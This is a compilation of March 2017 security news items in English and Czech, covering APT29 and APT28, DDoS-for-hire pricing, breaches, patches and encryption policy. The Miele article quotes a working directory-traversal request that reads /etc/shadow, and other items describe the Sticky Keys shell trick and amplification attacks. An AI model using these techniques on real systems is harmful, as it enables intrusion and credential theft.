Fraud Prevention Cloud nicméně nezasahuje pouze v průběhu přihlašování, ale během celého provozu. Vytváří přitom statistické modely různých behaviorálních vzorců za využití technologií strojového učení.

A konečně clientless malwarová detekce kombinuje přímé a proaktivní techniky detekce. Přímou technikou se zjišťuje, jestli uživatelovo zařízení neslouží k přímému útoku na konkrétní digitální službu organizace.

Druhá technika proaktivní detekce pomáhá identifikovat malware, který bezprostředně neohrožuje organizaci, ale mohl by být ke škodlivému účelu přizpůsoben a zaútočit v budoucnosti. Tyto techniky v případě, že dojde ke skutečnému útoku, minimalizují rizika a ztráty.


Internet-Connected Medical Washer-Disinfector Found Vulnerable to Hacking
27.3.2017 thehackernews IoT


Internet-of-Things devices are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices.
There are, of course, some really good reasons to connect certain devices to the Internet. For example, remotely switching on your A/C a few minutes before you enter your home, instead of leaving it blasting all day.
But does everything need to be connected?
Of course, not. One such example is the latest bug report at Full Disclosure, affecting an Internet-connected washer-disinfector appliance by Germany-based manufacturer Miele.
The Miele Professional PG 8528 appliance, which is used in medical establishments to clean and properly disinfect laboratory and surgical instruments, is suffering from a Web Server Directory Traversal vulnerability.
Jens Regel of German consultancy Schneider & Wulf has discovered the flaw (CVE-2017-7240) that allows an unauthenticated, remote attacker to access directories other than those needed by a web server.
Once accessed, the attacker can steal sensitive information stored on the server and even insert their own malicious code and tell the web server to execute it.
"The corresponding embedded web server 'PST10 WebServer' typically listens to port 80 and is prone to a directory traversal attack, [and] therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aid in subsequent attacks," Regel explained.
Proof-of-Concept Exploit Code Released!
Regel also published proof-of-concept (PoC) exploit code for this vulnerability, which means hackers can now exploit the vulnerability before the vendor issue a patch.
The PoC exploit is simple for anyone to run:
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN.
It's unclear which libraries Miele used to craft the Web server, though, according to Regel, he's able to request the embedded system's shadow file – and by extension any file on the filesystem.
The researcher privately disclosed the vulnerability to Miele in November 2016, but did not hear back from the vendor for more than three months. So, it when a fix can be expected (or if it exists) is still unknown.
Therefore, the best option to keep yourself secure is to disconnect the appliance from the Internet for the time being until the patch is released.


APT29 Cyberspies Use Domain Fronting to Evade Detection

27.3.2017 securityweek APT
The Russia-linked cyber espionage group known as APT29 has been using a technique called “domain fronting” in an effort to make it more difficult for targeted organizations to identify malicious traffic, FireEye reported on Monday.

Domain fronting is a censorship bypassing technique that involves disguising traffic to make it look as if it’s going to a host allowed by the censor, such as Google, Amazon or CloudFlare. Open Whisper Systems recently implemented the technique to help Signal users in Egypt and the United Arab Emirates bypass government censorship.

According to FireEye, the technique has been used for at least two years by the threat actor APT29, which is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.

APT29 has used the Tor anonymity network to communicate with infected machines, which could be considered suspicious by some defenders. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin that implements domain fronting and allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.

In its attacks, APT29 used a PowerShell script and a .bat file to install the Tor client and the Meek plugin on the targeted system. They leveraged an exploit involving the Sticky Keys accessibility feature, where they replaced the legitimate executable with the Windows Command Prompt (cmd.exe) file. This provides the attacker a shell that they can use to execute commands with SYSTEM-level privileges, including to add or modify accounts.

The script that executes the Sticky Keys exploit also creates a Windows service named “Google Update” to ensure that the backdoor remains even after the system has been rebooted.

“APT29 adopted domain fronting long before these techniques were widely known,” said FireEye’s Matthew Dunwoody. “By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.”


Czech Leader Says Computer Hacked With Child Porn

27.3.2017 securityweek Hacking
Czech President Milos Zeman has alleged that hackers based in the US state of Alabama put child pornography on one of his computers a year ago, his official website said Monday.

The ex-communist known for staunch anti-Muslim, pro-Russian and pro-Chinese views announced earlier this month that he would run for a second five-year term in January's presidential election.

"About a year ago, someone installed child pornography on my computer," Zeman said, according to a transcript of an interview with the Frekvence 1 commercial radio station posted to his website.

"I looked at it for about 10 seconds before I realised what was going on," said Zeman, a 72-year-old veteran leftwinger and the first-ever directly elected Czech head of state.

Zeman added that he had initially considered filing a criminal complaint, but then changed his mind after consulting his IT staff.

Hackers have also targeted other senior Czech officials.

Foreign Minister Lubomir Zaoralek said in January that hackers had compromised his official email account as well as dozens of others belonging to ministry employees.

Zaoralek said the data leak was "considerable" but that no classified information had been stolen.

Politicians worldwide are falling prey to hack attacks with ever increasing frequency.

US intelligence in January accused Russian President Vladimir Putin of ordering a campaign of hacking and media manipulation aimed at undermining Hillary Clinton's presidential campaign in favor of Donald Trump.

Last October, Czech police arrested a Russian hacker in Prague in cooperation with the FBI and accused him of staging cyber attacks on the United States.

The hacker is in custody in the Czech Republic pending extradition to the United States or Russia as both countries have asked Prague to hand over the suspect.


 


The cost of launching a DDoS attack
27.3.2017 Kaspersky Attack
BOTNETS DDOS-ATTACKS
A distributed denial-of-service (DDoS) attack is one of the most popular tools in the cybercriminal arsenal. The motives behind such attacks can vary – from cyber-hooliganism to extortion. There have been cases where criminal groups have threatened their victims with a DDoS attack unless the latter paid 5 bitcoins (more than $5,000). Often, a DDoS attack is used to distract IT staff while another cybercrime such as data theft or malware injection is carried out.

Almost anyone can fall victim to a DDoS attack. They are relatively cheap and easy to organize, and can be highly effective if reliable protection is not in place. Based on analysis of the data obtained from open sources (for example, offers to organize DDoS attacks on Internet forums or in Tor), we managed to find out the current cost of a DDoS attack on the black market. We also established what exactly the cybercriminals behind DDoS attacks offer their customers.

DDoS as a service

Ordering a DDoS attack is usually done using a full-fledged web service, eliminating the need for direct contact between the organizer and the customer. The majority of offers that we came across left links to these resources rather than contact details. Customers can use them to make payments, get reports on work done or utilize additional services. In fact, the functionality of these web services looks similar to that offered by legal services.

 

Example of a web service for ordering DDoS attacks that looks more like the web page of an IT startup than a cybercriminal operation

These web services are fully functional web applications that allow registered customers to manage their balance and plan their DDoS attack budget. Some developers even offer bonus points for each attack conducted using their service. In other words, cybercriminals have their own loyalty and customer service programs.

 

DDoS service advertised on a Russian public forum offering attacks from $50 per day

Some of the services we identified contained information on the number of registered users, as well as data on the number of attacks carried out per day. Many of the web services offering DDoS attacks claimed to have tens of thousands of registered accounts. However, these figures may be inflated by the owners of services to make their resources look more popular.

 

Statistics provided by one service to demonstrate its popularity with DDoS customers (479270 implemented attacks)

 

Statistics provided by one service to demonstrate the popularity of DDoS attack scenarios

 

Information about the popularity of a DDoS service

Rates for DDoS

The special features emphasized in the adverts for DDoS services can give a particular service an advantage over its competitors and sway the customer’s choice:

The target and its characteristics. A cybercriminal that agrees to attack a government resource will attract customers who are interested in this particular service. The attacker can ask for more money for this type of service than they would for an attack on an online store. The cost of the service may also depend on the type of anti-DDoS protection the potential victim has: if the target uses traffic filtering systems to protect its resources, the cybercriminals have to come up with ways of bypassing them to ensure an effective attack, and this also means an increase in the price.

Attack sources and their characteristics. This factor can determine the price the attackers ask for conducting their attacks. The cheaper it is for a criminal to maintain a botnet (defined, for example, by the average cost of infecting a device and including it in a botnet), the more likely they are to ask for bargain-basement prices for their services. For example, a botnet of 1000 surveillance cameras may be cheaper in terms of organization than a botnet of 100 servers. This is because cameras and other IoT devices are currently less secure – a fact that is often ignored by their owners.

Attack scenario. Requests for atypical DDoS attacks (for example, the customer may ask the botnet owner to alternate between different methods of DDoS attacks within a short period of time or implement several methods simultaneously) can increase costs.

The average cost of a DDoS attack as a service in a particular country. Competition can cause cybercriminals to raise or lower the cost of their services. They also try to take into consideration the ability of their audience to pay and devise their pricing policy accordingly (for example, a DDoS attack will cost US customers more than a similar offer in Russia).

Along with specific botnet features, the organizers of DDoS services also offer customers a tariff plan in which the buyer pays a per-second rental price for botnet capacity. For example, a DDoS attack of 300 seconds using a botnet with a total bandwidth of 125 Gbps will cost €5, with all other characteristics (power and scenarios) remaining the same for all tariffs.

 

The price list for one of the biggest services offering DDoS attacks

A DDoS attack lasting 10,800 seconds will cost the client $60, or approximately $20 per hour, and the attack specifications (scenario and computing power used) were not always stated on the customer-facing resource. Apparently, not all cybercriminals consider it appropriate to disclose the inner workings of their botnet (it’s also possible that some owners don’t actually understand the technical characteristics of their botnets). In particular, they don’t disclose the type of bots included in a botnet.

The price includes implementation of the following rather trivial scenarios:

SYN-flood;
UDP-flood;
NTP-amplification;
Multi-vector amplification (several amplification scenarios simultaneously).
 

The price list for a service that, with just a few clicks, allows clients to order a DDoS attack on an arbitrary resource accompanied with a detailed report

Some services offer a choice of attack scenario, which allows cybercriminals to combine different scenarios and perform attacks tailored to the individual characteristics of the victim. For example, if the victim successfully combats SYN-flood, the attacker can switch the scenario on the control panel and evaluate the victim’s reaction.

 

Various tariffs of an English-language service that varies its pricing according to the number of seconds a DDoS attack lasts

Among the offers we analyzed there were some in which the attackers stated different prices for their services depending on the type of victim.

 

Information found on a Russian site dedicated entirely to DDoS services

For example, the cybercriminals ask for $400 per day to attack a site/server that uses anti-DDoS protection, which is four times more expensive than an attack on an unprotected site.

Moreover, not all cybercriminals offering DDoS attacks will agree to attack government resources: such sites are closely monitored by law enforcement agencies, and the organizers don’t want to expose their botnets. However, we did come across services offering attacks on government resources as a separate item in the price list.

 

“The price may change if the resource has political status” reads a resource promoting DDoS attacks

Interestingly, some criminals see nothing wrong with providing protection from DDoS along with their DDoS attack services.

 

Some services offering DDoS attacks may also offer protection from such attacks

Pricing: a “cloud” example

Let’s consider a DNS amplification attack scenario. This type of attack involves the sending of a specially formed request (for example, 100 bytes in volume) to a vulnerable DNS server that responds to the “sender” (i.e. the victim) with a larger volume (kilobyte) of data. The botnet may consist of tens or even hundreds of such servers or the resources of a public cloud service provider. Add in public web load testing services that can be used to carry out a SaaS amplification attack, and we end up with a fairly heavy “sledgehammer”.

 

DDoS = Cloud + DNS Amplification + SaaS Amplification

The cost of this service depends on the cost of the provider’s resources. Let’s take Amazon EC2 as an example – the price for a virtual dedicated server with minimal configuration (for a DDoS attack, the configuration of the infected workstation is not as important as its bandwidth connection) is about $0.0065 per hour. Therefore, 50 virtual servers for the organization of a low-powered DDoS attack on an online store will cost cybercriminals $0.325 per hour. Taking into account additional expenses (for example, a SIM card to register an account and adding a credit card to it), an hour-long DDoS attack using a cloud service will cost the criminals about $4.

 

Price list for popular cloud service providers

This means the actual cost of an attack using a botnet of 1000 workstations can amount to $7 per hour. The asking prices for the services we managed to find were, on average, $25 per hour, meaning the cybercriminals organizing DDoS attack are making a profit of about $18 for every hour of an attack.

Conclusion

The clients of these services understand perfectly well the benefits of DDoS attacks and how effective they can be. The cost of a five-minute attack on a large online store is about $5. The victim, however, can lose far more because potential customers simply cannot place an order. We can only guess how many customers an online store loses if an attack lasts the whole day.

At the same time, cybercriminals continue to actively seek new and cheaper ways to organize botnets. In this regard, the Internet of things makes life easier for them. One of the current trends is the infection of IoT devices (CCTV cameras, DVR-systems, “smart” household appliances, etc.) and their subsequent use in DDoS attacks. And while vulnerable IoT devices exist, cybercriminals are able to exploit them.

It should be noted that DDoS attacks and, in particular, ransomware DDoS have already turned into a high-margin business: the profitability of one attack can exceed 95%. And the fact that the owners of online sites are often willing to pay a ransom without even checking whether the attackers can actually carry out an attack (something that other fraudsters have already picked up on) adds even more fuel to the fire. All the above suggests that the average cost of DDoS attacks in the near future will only fall, while their frequency will increase.


Apple Updates iTunes to Patch SQLite, Expat Flaws

27.3.2017 Securityweek Apple

Apple updated the Windows and Mac versions of iTunes last week to address more than a dozen vulnerabilities affecting the Expat and SQLite libraries.

iTunes 12.6 for Windows and OS X address seven flaws in SQLite, a cross-platform library that implements a self-contained, embeddable, zero-configuration SQL database engine. The latest iTunes versions also resolve ten vulnerabilities in the Expat XML parser library.

iTunes 12.6 updates SQLite to version 3.15.2, released in late November 2016, and Expat to version 2.2.0, released in June 2016.

The CVE identifiers mentioned in Apple’s advisories show that the company has not updated these components for several years.

For example, CVE-2013-7443 was patched in SQLite in February 2014, CVE-2015-3414 was patched in April 2015, and CVE-2016-6153 was fixed in May 2016. Most of the flaws resolved in iTunes can be exploited for denial-of-service (DoS) attacks, but some of them could also allow arbitrary code execution and privilege escalation.

In the case of Expat, Apple’s advisory mentions some vulnerabilities that were patched in March 2012 with the release of Expat 2.1.0. The security holes in Expat can also be exploited mostly for DoS attacks, but arbitrary code execution may also be possible in some cases.

It’s worth noting that a majority of the iTunes updates released last year patched vulnerabilities affecting the WebKit browser engine. One of the Windows updates, released in July, patched flaws in the libxml2 and libxslt libraries.


JobLink Breach Affects Job Seekers in 10 States

27.3.2017 Securityweek IT

America’s JobLink (AJL), a multi-state online service that connects job seekers with employers, informed users last week that a malicious hacker breached the company’s systems.

The attacker exploited a vulnerability in the JobLink application to gain access to job seekers’ personal information, including names, dates of birth and social security numbers (SSNs). According to AJL, the attacker created an account on the platform and exploited a “misconfiguration” to access information on other users.

Law enforcement has been notified and a forensics firm has been called in to determine the cause and impact of the incident. AJL said the attacker created an account on the application on February 20, and the first signs of suspicious activity were noticed on March 12. The vulnerability, apparently introduced in October 2016, was patched on March 14.

AJL pointed out that the attack did not involve any type of malware, and it did not affect the company’s ReportLink or CertLink products.

The investigation showed that the attacker accessed information on users in Alabama, Arkansas, Arizona, Delaware, Idaho, Illinois, Kansas, Maine, Oklahoma and Vermont. These states use the JobLink service to coordinate federal unemployment and workforce development programs.

Individuals who created accounts before March 14 could be affected, and AJL has promised to send out email notifications to individuals whose accounts have been breached within 5-10 business days. Affected users may also be eligible for credit monitoring services.

An investigation has also been launched by the Department of Labor in the affected states, and each state has published information about the breach on its official website. More than 250,000 users could be affected in Delaware, 170,000 accounts may have been compromised in Idaho, while Vermont said the breach could impact up to 180,000 accounts.

StateScoop reported that more than 280,000 accounts are affected in Maine, and the breach could impact as many as 4.8 million accounts across the ten states.

At least one law firm is urging affected job seekers to step forward, which indicates that AJL is facing a lawsuit.


Zařízení s Androidem jsou nebezpečná, varuje průzkum

27.3.2017 SecurityWorld Android
Skoro tři čtvrtiny zařízení s Androidem obsahuje bezpečnostní aktualizace zastaralé až dva měsíce. Uživatelé se tak vystavují riziku, že jejich mobily či tablety mohou být napadené.

Se statistikou přišla společnost Skycure, specializující se právě na bezpečnost mobilních zařízení.

Obecně lze říci, že množství útoků na mobilní zařízení roste a podstatný díl na tom mají i samotní uživatelé, kteří dostatečně nedbají na jejich bezpečnost. Podle Skycure není v 71 % zařízení s Androidem nainstalován aktuální bezpečnostní patch. A právě tato zařízení jsou nejčastěji mezi napadenými.

Průzkum tak potvrzuje nedávno zveřejněnou zprávu Googlu, podle které na zhruba polovině zařízení s Androidem neproběhla aktualizace s potřebným bezpečnostním patchem už přinejmenším rok.

Mnozí uživatelé argumentují, že systémové aktualizace snižují výkon jejich zařízení, a proto se jim vyhýbají. Odborníci však kontrují tím, že takové uvažování je nesmyslné, jelikož škodlivý software, kterému takovým konáním uvolňujeme cestu, ve finále výkon snižuje mnohem víc.

„Všichni se můžeme chovat ještě zodpovědněji, pokud jde o zabezpečení našich telefonů – výrobci, operátoři i uživatelé,“ říká Varun Kohli, marketingový specialista Skycure. Podle něj je však problémem i to, že mnozí uživatelé o aktualizacích vůbec neví nebo zkrátka mají zastaralý telefon, který je nepodporuje.

„Důrazně však doporučujeme záplatovat každé zařízení s Androidem co nejdřív to jde, protože každý patch je vyvinutý k předcházení nově objeveným hrozbám.“

Mimochodem, ukázalo se například, že s ohledem mobilních hrozeb je nejrizikovějším městem v USA Boston, kde množství útoků na mobilní zařízení v posledním kvartále loňského roku vzrostlo o 960 %. Mezi nejbezpečnější z velkých měst patří naopak San Francisco.


Šifrované zprávy jsou na internetu nepřijatelné, burcuje britská ministryně

27.3.2017 Novinky/Bezpečnost BigBrother
Proti vyspělým metodám šifrování při šíření zpráv v globální počítačové síti se v neděli v Londýně vyslovila britská ministryně vnitra Amber Ruddová. Podobnou metodu, kterou mimo jiné nabízí komunikační síť Whatsapp, podle agentury Reuters využil těsně před středečním útokem v Londýně atentátník Khalid Masood.
Ruddová kritizovala zejména šifrovací metodu E2EE (end-to-end encryption), která umožňuje číst zprávy posílané přes internet výhradně odesilateli a adresátovi. Poskytovatel připojení, který přenos zajišťuje, nemá možnost informaci rozumět a zprostředkovat její obsah komukoli jinému, například tajným službám nebo protiteroristickým složkám.

Ruddová podobné šifrovací metody označila za "absolutně nepřijatelné", protože pro komunikaci teroristů vytvářejí uzavřenou síť. "Je to absolutně nepřijatelné, teroristé by neměli mít žádný úkryt. Musíme zajistit, aby služby jako je Whatsapp neumožňovaly teroristům vzájemně komunikovat," řekla britská ministryně stanici BBC. Britské tajné služby podle ní musejí mít možnost do šifry proniknout.

Masood ve středu u britského parlamentu zabil čtyři lidi a dalších 50 zranil. Nejdřív najel do kolemjdoucích autem, a pak zaútočil nožem, než ho zastřelila policie.


Hackeři napadli prezidentův počítač, nahráli mu tam dětské porno

27.3.2017 Novinky/Bezpečnost  Hacking
Počítač prezidenta Miloše Zemana na zámku v Lánech se před rokem stal terčem hackerů. Nahráli do něj fotografie dětského porna. Hackerský útok potvrdil v nedělním pořadu Pressklub rádia Frekvence 1 sám Zeman.
„Pustil jsem počítač a nevěřícně jsem asi deset vteřin zíral, co se to děje, než mi došlo, že jde o hackerský útok,“ popsal Zeman. Ačkoliv chtěl na útočníka podat trestní oznámení, měl smůlu. „IT specialisté mi oznámili, že útok přišel z Alabamy a na tu jsme s trestním oznámením krátcí,“ uzavřel prezident.

Hlava státu se v loňském roce nestala první obětí z řad vrcholných českých politiků, kterým se hackeři nabourali do počítačů. Vloni v lednu prolomili soukromou e-mailovou schránku premiérovi Bohuslavu Sobotkovi (ČSSD). Stáhli z ní desítky zpráv, v nichž se projednávaly státní i soukromé záležitosti.

Krátce před Vánocemi roku 2015 hackeři nabourali také Sobotkův twitterový účet a objevily se na něm falešné tweety, které volaly po boji proti uprchlíkům a označovaly je za invazní armádu.

Hackerské útoky zažila v roce 2013 také Strana práv občanů. U některých článků se místo snímků politiků objevily pornofotky. S napadením facebookového profilu se potýkal také poslanec Jaroslav Foldyna (ČSSD). Do e-mailu se nabourali počítačoví zločinci i exministru zahraničí Janu Kavanovi (ČSSD) či bývalému premiérovi Vladimíru Špidlovi (ČSSD).


Top German official said Germany blocked Russian APT28 cyber attacks in 2016
27.3.2017 securityaffairs APT

According to a German top official, Germany warded off two cyber attacks launched by the Russian state actor APT28 group in 2016.
On Friday, a top German official told Reuters that last year Germany warded off two cyber attacks launched by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium)

According to Arne Schoenbohm, president of the Federal Office for Information Security (BSI), the first attack occurred in May 2016, the hackers attempted to create an Internet domain for Chancellor Angela Merkel’s Christian Democratic Union (CDU) party in the Baltic region

The second attack was observed months later, the hackers launched a spear-phishing campaign against German parties in the lower house of parliament, the Bundestag. Experts said that attack used a NATO domain name to try to inject malicious software into the networks of politicians.

“Experts said that attack used a NATO domain name to try to inject malicious software into the networks of politicians.” reported the Reuters agency.

APT28 targets Germany

The U.S. intelligence agencies warned in early this year that Russia was likely to target other European states in the next months, especially France and Germany that are holding major elections.

“Germany remains in danger in the cyber arena since we are highly digitized,” Schoenbohm told Reuters in an interview. “The more we digitize, the more dependent we become on networks, the greater the risk of attack.”

Schoenbohm explained that the German Government has largely invested to improve the security of its networks against cyber attacks. It is conducting an awareness campaign to educate politicians and parties about how to protect their networks.

“We give them advice and help them with certain measures. But in the end, what each party does is its own responsibility,” Schoenbohm said.

The official also added that Germany is sharing information on cyber attacks with other governments targeted by the APT28 group, including United States and France.

In 2015, the APT28 group stole 16 gigabytes of data from the German parliament. In December the APT28 group also targeted the Organization for Security and Cooperation in Europe (OSCE) in December, the organization is a security and human rights watchdog, the attack is part of a cyber espionage operation.

“Schoenbohm said neither of the 2016 attacks targeting Germany – or a string of others he did not detail – was successful, but it was unclear to what extent political parties might have experienced security breaches.” continues the Reuters.

Schoenbohm welcomed work by Merkel’s coalition on a law that would bolster the security posture of the Government. The law will enforce security for a growing number of household Internet-connected appliances that are exposed to cyber attacks.

The diffusion of IoT devices must be accomplished by a significant improvement of their security to keep the owner safe.

“The worst thing that could happen” would be that consumers withdrew from the so-called ‘Internet of Things’ for fear of being hacked, he said. “We want to have a successful digitization.”


How much costs a DDoS attack service? Which factors influence the final price?
27.3.2017 securityaffairs Attack

How much costs a DDoS attack service? Kaspersky Lab published an analysis on the cost of a DDoS attack and services available in the black markets.
The DDoS attacks continue to be a profitable business in the cyber criminal underground. Powering a DDoS attack against an organization is even cheaper, running an attack can cost as little as $7 an hour, while a targeted DDoS against a company can cost up to thousands or millions of dollars.

DDoS attack service

Kaspersky Lab has published an interesting analysis on the cost of DDoS attacks. The experts estimated that the cost to power a DDoS attack using a cloud-based botnet of 1,000 desktops is about $7 per hour. A DDoS attack service typically goes for $25 an hour, this means that the expected profit for crooks is around $25-$7=$18 per hour.

Prices are highly variable, a DDoS attack can cost from $5 for a 300-second attack to $400 for 24 hours.

“This means the actual cost of an attack using a botnet of 1000 workstations can amount to $7 per hour. The asking prices for the services we managed to find were, on average, $25 per hour, meaning the cybercriminals organizing DDoS attack are making a profit of about $18 for every hour of an attack.” reads the analysis published by Kaspersky.

It is easy for criminals to pay for a DDoS attack service available in one of the numerous black markets. The services are easy to use and implement an efficient reporting system.

The majority of booters implements useful dashboards that allow them to manage loyalty programs and allow customers to plan their DDoS attacks according to the availability of the attacking infrastructure.


The experts at Kaspersky explained that prices for DDoS attack services depend on their generation as well as the source of attack traffic. For example, DDoS attacks powered by IoT botnets are cheaper than the ones powered by a botnet of servers.

“For example, a botnet of 1000 surveillance cameras may be cheaper in terms of organization than a botnet of 100 servers. This is because cameras and other IoT devices are currently less secure – a fact that is often ignored by their owners.” reads the report.

Another factor that influences the final price for a DDoS attack service is the target and its characteristics. Some services could be used to hit also well-resourced websites, such as the site of a Government. Of course, these services are more expensive.

“The cost of the service may also depend on the type of anti-DDoS protection the potential victim has: if the target uses traffic filtering systems to protect its resources, the cybercriminals have to come up with ways of bypassing them to ensure an effective attack, and this also means an increase in the price.” reads the report.

To give an idea of the cost, a DDoS attack against an unprotected website ranges from $50 to $100, while an attack on a protected site can go for $400 or more.

The cost of a cyber attack depends also on the location of targeted websites, DDoS attacks on English-language websites are usually more expensive than similar attacks on Russian-language sites.

Crooks can power DDoS attacks for extortion, ransomware DDoS have already turned into a high-margin business, experts at Kaspersky explained that the profitability of one attack can exceed 95%.

Victims of an ongoing DDoS attack are often willing to pay a ransom to stop the offensive.

All the data presented suggests that the average cost of DDoS attacks in the near future will continue to drop, while their frequency will increase.


Nenechte se zahltit falešnými poplachy

26.3.2017 SecurityWorld Zabezpečení
Díky technologiím, jako jsou například systémy IDS (systémy detekce narušení), lze dnes shromažďovat nebývalé množství dat o hrozbách a útocích. Díky nim se organizace mohou včas dozvědět o nejnovějších hrozbách. Bohužel to však také může přidat otravný a nákladný problém falešných poplachů, kdy se normální či očekávané chování považuje za anomální či škodlivé.

Falešné poplachy jsou problémem nejen proto, že zatěžují personál a vyžadují čas na řešení, ale také proto, že mohou pozornost firmy odvádět od řešení skutečných bezpečnostních problémů.

Podle zprávy „Data-Driven Security Reloaded“ z roku 2015 od výzkumné firmy EMA (Enterprise Management Associates) uvedla polovina z více než 200 dotázaných správců IT a personálu zabezpečení, že jim příliš mnoho falešných poplachů znemožňuje spoléhat se na detekci narušení.

Při dotazu na to, co považují za klíčový přínos softwaru pro pokročilou analytiku, uvedlo 30 procent dotázaných organizací snížení počtu falešných poplachů.

„Falešné poplachy byly vždy problémem bezpečnostních nástrojů, ale jak se přidává více vrstev ochrany zabezpečení, roste kumulativní dopad těchto nepravých alarmů,“ uvádí Paul Cotter, architekt bezpečnostní infrastruktury v poradenské společnosti West Monroe Partners.

Nejběžnější jsou falešné poplachy v produktech, jako jsou detekce a prevence narušení sítě, platformy pro ochranu koncových bodů a také nástroje detekce a reakce pro koncové body, popisuje Lawrence Pingree, ředitel výzkumu bezpečnostních technologií v Gartneru.

„Každé z těchto řešení používá různé metody detekce útoků, jako jsou například charakteristické signatury, detekce chování atd.,“ uvádí Pingree. „Falešné poplachy jsou problémem, protože podstata pokusů detekovat špatné chování se někdy překrývá s příznaky dobrého chování.“

Dobrým příkladem toho, jaký mohou mít falešné poplachy dopad, je známý únik dat ze společnosti Target, „kde technologie použitá k monitorování narušení generovala mnoho upozornění v různých případech podezřelých aktivit,“ vysvětluje Pritesh Parekh, ředitel zabezpečení informací ve finanční společnosti Zuora.

„Relevantní varování se ztratila ve stovkách falešných poplachů a nezískala prioritu v seznamu bezpečnostních problémů, takže výsledkem byl velký únik dat,“ popisuje Parekh.

Důležitá rovnováha

Existuje zde jemná rovnováha, kterou musejí bezpečnostní profesionálové zajistit při řešení problémů, popisuje Cotter. Na jedné straně musejí zabezpečit, aby nástroj nenarušoval každodenní provoz a negeneroval další práci pro organizaci.

Na straně druhé však musejí zohlednit, že i jediný opodstatněný poplach (například nezjištěné vniknutí) může mít mnohem větší dopad na organizaci než mnoho poplachů falešných.

„Největším rizikem falešných poplachů je, že nástroj vygeneruje tolik upozornění, že je nakonec vnímán jako jakýsi generátor šumu a všechny skutečné problémy se začnou ignorovat v důsledku únavy osob, které tyto nástroje spravují,“ varuje Cotter.

Často podle něj tento problém lze vidět u nástrojů, které nejsou správně používané, jako například když dojde k nainstalování a použití výchozích nastavení a profilů.

Typickým takovým příkladem je software pro monitoring integrity souborů, který upozorní správce na libovolné změny souborů v monitorovaném systému, což může být příznak malwaru či aktivity vetřelce.

„Při použití výchozího nastavení vygeneruje instalace jednoduché opravy velké množství změn souborů a v souhrnu to u středně velkého podniku může snadno vytvořit mnoho desítek tisíc varování,“ upozorňuje Cotter.

Všechna významná varování se snadno v takové záplavě informací ztratí a správci je mohou považovat za důsledek aktualizací.

„Pro vyřešení tohoto problému je nutné zavést důkladný proces testování aktualizací a je potřeba vytvořit určitou podobu ‚otisků prstů‘, jejich změn, aby bylo možné taková specifická upozornění odfiltrovat, a aby tak zůstala jen jasná množina upozornění, která by měli správci skutečně přezkoumat,“ popisuje Cotter.

Definování, vyladění, implementace a vykonávání tohoto procesu zvyšují úsilí potřebné k podpoře provozu nástroje, mohou však drasticky snížit dlouhodobé náklady na vlastnictví i zvýšit efektivitu rozlišení užitečných informací od šumu a v důsledku toho i zlepšit použitelnost samotného systému, uvádí Cotter.

„Mnoho dalších nástrojů zabezpečení má podobný problém s nadměrným množstvím varování, která se často ignorují pro nízký poměr užitečných informací vůči šumu,“ tvrdí Cotter.

„Mezi příklady lze uvést systémy IDS (detekce narušení), firewally webových aplikací a další systémy, které monitorují koncové body dostupné z internetu.“

Pochopení podstaty

Řešení problému falešných poplachů by mělo začínat důkladným pochopením toho, co má daný nástroj řešit, a také jak funguje.

„Při implementaci nástroje zajistěte, aby personál pracující na zavádění plně chápal záměr nasazení nástroje, a aby tak nedocházelo ke zbytečným dohadům o obvyklých případech použití nebo jen k pouhé instalaci nástroje s výchozími nastaveními,“ radí Cotter.

Z provozního a vzdělávacího pohledu ovlivní každé nasazení nástroje zabezpečení existující zásady a postupy včetně reakce na incidenty a všechny provozní postupy pro systémy, na které má nástroj vliv, vysvětluje Cotter.

„Tento dopad by se měl přezkoumat a schválit a dokumentace pro zásady i postupy by se měla společně s nasazením nástroje zaktualizovat, aby se zajistilo, že změna bude mít na provozní činnosti jen minimální dopad,“ dodává Cotter.

Personál zabezpečení potřebuje zejména pochopit, že ne každý detekovaný případ má škodlivou podstatu, prohlašuje Pingree. Podle něj existuje celá řada způsobů, jak kategorizovat incidenty za účelem identifikace falešných poplachů.

Vyšetřovatel například zkontroluje detekovanou škodlivou událost a poté určí pravděpodobnost, že je tato aktivita skutečně škodlivá.

„Tito lidé musejí udělat řadu kroků, aby mohli stanovit škodlivost příslušné události. Například prozkoumat, zda došlo k úniku dat nebo jestli chování vypadá při bližším přezkoumání jako přijatelné,“ vysvětluje Pingree.

Většina produktů poskytne více podrobností k určení, zda něco vypadá jako detekce falešného poplachu, tvrdí Pingree. Vyšetřovatel může porovnat detekovanou událost se známými dobrými vzorky souborů, jako jsou například whitelisty.

V případě, že jde o zkoumání varování týkající se sítě, mohou vyšetřovatelé prozkoumat další zdroje dat, například informace o IP adrese, doménové jméno, a využít další funkce hodnocení škodlivosti, jako jsou třeba skóre reputace IP adresy či malwarové skenování adresy URL.

„Někdy jsou tato skóre odvozená ze zkoumání minulého chování nebo účasti určité URL či IP adresy na útocích v minulosti,“ vysvětluje Pingree.

Podle něj zde existuje určitá míra nejistoty, ale většinou je možné pomocí bližšího přezkoumání protokolů, zachycených paketů a dalších uživatelských aktivit souvisejících s incidentem určit, zda je něco více než pravděpodobně falešným poplachem nebo reálnou hrozbou.

Síla v ladění

Při konfiguraci a ladění nových bezpečnostních nástrojů pro snížení počtu falešných poplachů i zajištění dostatečného pokrytí.


Fraudsters Using GiftGhostBot Botnet to Steal Gift Card Balances
26.3.2017 thehackernews Crime

Gift cards have once again caused quite a headache for retailers, as cyber criminals are using a botnet to break into and steal cash from money-loaded gift cards provided by major retailers around the globe.
Dubbed GiftGhostBot, the new botnet specialized in gift card fraud is an advanced persistent bot (APB) that has been spotted in the wild by cyber security firm Distil Networks.
GiftGhostBot has been seen attacking almost 1,000 websites worldwide and defrauding legitimate consumers of the money loaded on gift cards since Distil detected the attack late last month.
According to the security firm, any website – from luxury retailers, supermarkets to coffee distributors – that allow their customers to buy products with gift cards could be targeted by the botnet.
